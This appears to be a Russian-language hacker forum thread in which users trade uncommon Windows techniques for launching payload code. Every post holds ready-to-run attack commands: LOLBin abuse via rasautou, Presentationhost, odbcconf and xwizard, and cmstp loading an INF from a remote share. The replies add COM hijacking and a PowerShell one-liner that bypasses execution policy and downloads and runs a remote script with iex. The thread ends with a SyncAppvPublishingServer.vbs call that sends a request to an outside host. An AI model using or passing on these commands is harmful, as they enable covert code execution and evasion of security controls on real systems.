Редкие способы запуска пэйлод-кода в системе

[IPMASHEEN]

1. Способ локального выполнения
rasautou -d C:\xek.dll -p @DllMain12 -e 1 Presentationhost.exe C:\temp\Evil.xbap odbcconf /a {REGSVR foo.dll} /a {REGMDACVERSION 2.1.1} xwizard processXMLFile 1.txt

2. Через веб-сервер
cmstp.exe /ni /s \\10.211.55.28\test\cmstp.inf

Уверен, о некоторых способах вы ранее и не слышали Принимайте эстафету!
Интересно было бы увидеть нестандартные способы запуска скриптов через реестр

 

[DildoFagins]

Интересно было бы увидеть нестандартные способы запуска скриптов через реестр

COM-Hijacking через scrobj.dll и ScriptletURL.
Пример: https://github.com/homjxi0e/COM-Hijacking/blob/master/COM-Hijacking.bat

 

[qGodless]

Good old iex,
Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://github.com/Ox41/trararrar/blob/main/test.ps1'))

SyncAppvPublishingServer.vbs "Break; iwr http://10.0.0.5:443"